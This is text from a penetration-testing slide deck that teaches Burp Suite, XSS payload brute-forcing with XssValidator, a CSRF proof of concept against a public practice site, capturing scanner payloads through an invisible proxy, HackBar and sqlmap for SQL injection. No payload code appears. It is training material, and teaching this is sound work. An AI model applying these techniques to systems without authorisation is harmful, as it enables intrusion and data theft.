Академический Документы
Профессиональный Документы
Культура Документы
Dirty0124 (@dirtycoder0124)
AGENDA
• Mastering Burp Suite
• Hackbar (Manual Sql Injection)
• SqlMap (Automate Sql Injection)
• SoapUI (Testing for Web Services)
Burp Suite
• Intercept browser traffic using man-in-the-middle
proxy
• You can intercept and edit all requests made by your
browser
• Vulnerability Scanner
• Very Useful for Manual Penetration Testing
• Crawler
• Fuzzer
• In the dialog box that pops up, check the box "Trust this CA
to identify web sites", and click "OK".
• When an Intruder attack has resulted in some very large responses with
different lengths than the base response, you can compare these to
quickly see where the differences lie.
• When testing for blind SQL injection bugs using Boolean condition
injection and other similar tests, you can compare two responses to see
whether injecting different conditions has resulted in a relevant difference
in responses.
COMPARER
EXTENDER
• It is used to install burp add-ons.
• Very useful to enhance burp’s functionality
• User can install add-ons from BApp store
• User can also install add-ons which are open
source and available on net.
EXTENDER
EXTENDER – Install Open Source
addon
EXTENDER
• You need jython to install python based addon
• Download jython and provide path of your
jython file to Burp.
EXTENDER
• Some useful Burp suite add-ons
– Active Scan++
– CO2
– JSON Beautifier
– Reflected Parameters
– XssValidator
XssValidator
XSSValidator in BApp Store
XssValidator
• Step 1: Intercept a Request with some
parameter, for example "search" Request and
send to "Intruder".
XssValidator
• Step 2: Navigate to "Intruder" > under
"Payload Sets" > select "Payload type:
Extension-generated" > under "Payload
Options” > click "Select generator" (drop-
down menu)> window will open select
"Extension payload generator: XSS Validator
Payloads" > "Selected generator: XSS Validator
Payloads" > Click "OK".
XssValidator
XssValidator
• Step 3: Navigate to "XSSValidator" > copy
"Grep Phrase" in XSSValidator> Navigate to
"Intruder" > Under "Options“ tab > under
"Grep-Match", click "Clear” to clear all the
Grep match > Paste the Grep Phrase already
copied from "XssValidator".
XssValidator
XssValidator
XssValidator
• Start Attack
XssValidator
• Observe that Attack has been started and the
payloads are brute forced on the “search”
parameter.
XssValidator
• To observe the response in the browser, navigate to any
"Response" (positive response) and Right-Click to select
"Show response in browser".
XssValidator
XssValidator
Cross-Site Request Forgery
(CSRF)
POC WITH BURP SUITE
CSRF
• Cross-Site Request Forgery (CSRF) is an attack
that forces an end user to execute unwanted
actions on a web application in which they're
currently authenticated.
CSRF
• Step 1:-
– Visit : - http://testphp.vulnweb.com/login.php
– Username : test
– Password: test
CSRF
• Step 2: Capture the request by click on update
button
CSRF
CSRF
• Change phone no and click on “test in
browser”
CSRF
CSRF
CSRF
CSRF
Pro Tips
• Add website to scope
• Now make sure “Intercept is off”
• Visit site and explorer every link and form.
• Burp Suite works best in this environment.
Invisible Proxy in Burp Suite
Invisible Proxy
• We all know Acunetix, Nikto, nmap.
• But we don’t know, how they find
vulnerabilities?
• What payloads they use?
• Or simply what they do?
Invisible Proxy is the Solution
SETUP
1. Make change in your system host file
– 127.0.0.1 indeed.com
2. On Invisible proxy in Burp Suite
3. Run Acunetix or any other scanner on
– 127.0.0.1:8080
4. Capture the Request and learn from the
scanner
Entry in Host File
• Path: C:\Windows\System32\drivers\etc
Setting in Burp Suite
Acunetix
Request Captured
HACKBAR
HackBar
• HackBar is a Firefox addon
• It is used to do manual SQL Injection on web.
• Useless if you are using traditional HackBar
Modified HackBar
• There are several modified hackbar versions
available on net.
• ~/@H3LL4R_H5H is nice one
Modified HackBar
• Download :
– https://addons.mozilla.org/en-US/firefox/addon/~h3ll4r_h5h-hackmod/
Normal HackBar
Modified Hackbar DIOS
MOZILLA FIREFOX ADDONS
• Full support for six SQL injection techniques: boolean-based blind, time-
based blind, error-based, UNION query-based, stacked queries and out-
of-band.
• Support to download and upload any file from the database server
underlying file system when the database software is MySQL, PostgreSQL
or Microsoft SQL Server.
Cheat Sheet 1
Cheat Sheet 2
SQLMAP
How to use?
Crawl The Target [My Fav.]
Find Database
Customization
• Sometimes Sqlmap fails to detect Sql Injection
• Solution is to increase your Detection Phase
Customization
• By default sqlmap will test all GET and POST
parameters specified,